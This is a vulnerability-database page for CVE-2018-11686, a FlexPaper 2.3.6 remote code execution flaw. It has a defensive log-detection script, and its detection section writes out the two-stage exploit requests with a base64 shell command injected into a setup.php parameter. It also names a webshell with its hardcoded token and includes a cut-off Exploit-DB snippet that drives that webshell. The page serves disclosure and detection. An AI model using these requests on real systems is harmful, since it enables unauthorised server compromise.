CVE-2018-11686
Published 2019-07-03
CVE-2018-11686: The Publish Service in FlexPaper (later renamed FlowPaper) 2.3.6 allows remote code execution via setup.php and change_config.php.
Priority: P189 · critical · 9.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 49.79% (98.8th percentile)
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| flowpaper | flexpaper | <= 2.3.6 | — |
Detection & IOCs (extracted from sources)
Command:
```
GET /php/setup.php?step=4&PDF2SWF_PATH=echo+{{cmd_b}}+%7C+base64+-d+%7C+sh+%3Econfig/output.txt%3B HTTP/1.1
```
Command:
```
POST /php/change_config.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

SAVE_CONFIG=1&SWF_Directory=config/
```
- Detect exploitation attempt via POST to change_config.php with SAVE_CONFIG parameter
- Detect RCE trigger via GET request to setup.php with step=4 and PDF2SWF_PATH parameter containing shell commands
- Detect webshell access via tiger_shell.php with hardcoded access token 09877376116472742784324824mxmmxm in query string
- A successful config-save step redirects to index.php?msg=Configuration%20saved!; presence of this redirect confirms the precondition for RCE is met
- Monitor for creation or access of /php/config/output.txt, which is used to capture command output during exploitation
- Shodan/FOFA exposure query: search for servers with title 'FlexPaper' to identify potentially vulnerable internet-facing instances
- The exploit drops a webshell (tiger_shell.php) under /php/ with a hardcoded access token; defenders should scan for this file as a post-exploitation persistence indicator
- The RCE chain requires two stages: first a POST to change_config.php to set SWF_Directory, then a GET to setup.php with a base64-encoded shell command in PDF2SWF_PATH; detection logic must account for both steps
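The two-stage correlation described in the list above, as an added example that is not part of the advisory or of any source it cites: a Python pass over web access logs that links the config write to the later setup.php request and also flags the webshell and output-file paths. The log lines are constructed, and the 10-minute window, the alert labels, and keying on client IP are assumptions.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (common log format); IPs are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [14/Nov/2023:10:00:01 +0000] "POST /php/change_config.php HTTP/1.1" 302 0
198.51.100.7 - - [14/Nov/2023:10:00:03 +0000] "GET /php/setup.php?step=4&PDF2SWF_PATH=echo+PLACEHOLDER+%7C+base64+-d+%7C+sh+%3Econfig/output.txt%3B HTTP/1.1" 200 512
198.51.100.7 - - [14/Nov/2023:10:00:05 +0000] "GET /php/config/output.txt HTTP/1.1" 200 12
192.0.2.4 - - [14/Nov/2023:10:02:00 +0000] "GET /php/setup.php?step=4&PDF2SWF_PATH=%2Fusr%2Fbin%2Fpdf2swf HTTP/1.1" 200 700
203.0.113.9 - - [14/Nov/2023:10:05:00 +0000] "GET /php/setup.php?step=1 HTTP/1.1" 200 900
203.0.113.9 - - [14/Nov/2023:10:06:00 +0000] "GET /php/tiger_shell.php?cmd=PLACEHOLDER&access=PLACEHOLDER HTTP/1.1" 404 0
"""

LINE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
SHELL_META = re.compile(r"[|;&`$><]")   # characters a binary path should never contain
WINDOW = timedelta(minutes=10)          # assumption: max gap between stage 1 and stage 2

def detect(log_text):
    """Return (client_ip, label) alerts in log order."""
    alerts, config_saved = [], {}
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        ip, ts, method, target, _status = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        url = urlsplit(target)
        path, qs = url.path.lower(), parse_qs(url.query)  # parse_qs URL-decodes values
        if method == "POST" and path.endswith("/php/change_config.php"):
            # Stage 1. The body (SAVE_CONFIG=1) is not visible in access logs.
            config_saved[ip] = when
            alerts.append((ip, "config-write"))
        elif path.endswith("/php/setup.php") and qs.get("step") == ["4"] and "PDF2SWF_PATH" in qs:
            # Stage 2. Shell metacharacters in the path value mark injection.
            injected = bool(SHELL_META.search(qs["PDF2SWF_PATH"][0]))
            chained = ip in config_saved and when - config_saved[ip] <= WINDOW
            label = "rce-chain" if injected and chained else "rce-attempt" if injected else "setup-step4"
            alerts.append((ip, label))
        elif path.endswith("/php/tiger_shell.php"):
            alerts.append((ip, "webshell-access"))
        elif path.endswith("/php/config/output.txt"):
            alerts.append((ip, "output-file-read"))
    return alerts
```

A stage-2 request with shell metacharacters is still reported as `rce-attempt` when no prior config write was seen from the same address, since the two stages can arrive from different clients.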
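CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vulncheck | | 9.8 | CRITICAL | |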
GHSA
GHSA-pqf7-xmp7-f2q9: The Publish Service in FlexPaper (later renamed FlowPaper) 2
ghsa_unreviewed·2022-05-24
CVE-2018-11686 [CRITICAL] CWE-20 GHSA-pqf7-xmp7-f2q9: The Publish Service in FlexPaper (later renamed FlowPaper) 2
VulnCheck
flowpaper flexpaper Improper Input Validation
vulncheck·2018·CVSS 9.8
CVE-2018-11686 [CRITICAL] flowpaper flexpaper Improper Input Validation
Affected: flowpaper flexpaper
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References:
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-14&host_type=src&vulnerability=cve-2018-11686
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-24&host_type=src&vulnerability=cve-2018-11686
- https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-12&host_type=src&vulnerability=cve-2018-11686
- https://d
No detection rules found.
Exploit-DB
Flexpaper PHP Publish Service 2.3.6 - Remote Code Execution
exploitdb·2019-03-11·CVSS 9.8
CVE-2018-11686 [CRITICAL] Flexpaper PHP Publish Service 2.3.6 - Remote Code Execution
---
```python
#!/usr/bin/env python
#Exploit Title: FlexPaper PHP Publish Service >")
cmd = cmd.strip()
cmd = cmd.encode('base64').strip().replace("\n","")
link = url+"/php/tiger_shell.php?cmd=%s&access=09877376116472742784324824mxmmxm" %cmd.strip()
#print link
try:
    response = urllib2.urlopen(link, context=ctx)
    page = response.read()
    print page
except Exception as exc:
    print exc
    continue
```
Nuclei
FlexPaper/FlowPaper 2.3.6 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2018-11686 [CRITICAL] FlexPaper/FlowPaper 2.3.6 - Remote Code Execution
Template:
```yaml
id: CVE-2018-11686
info:
  name: FlexPaper/FlowPaper 2.3.6 - Remote Code Execution
  author: iamnoooob,pdresearch,pszyszkowski
  severity: critical
  description: |
    The Publish Service in FlexPaper (later renamed FlowPaper) 2.3.6 allows remote code execution via setup.php and change_config.php.
  impact: |
    Unauthenticated attackers can execute arbitrary code on the server through the Publish Service, leading to complete server compromise and access to all hosted documents.
  remediation: |
    Upgrade to FlowPaper version 2.3.7 or later, or remove the vulnerable Publish Service.
  reference:
    - https://nvd.nist.gov/v
```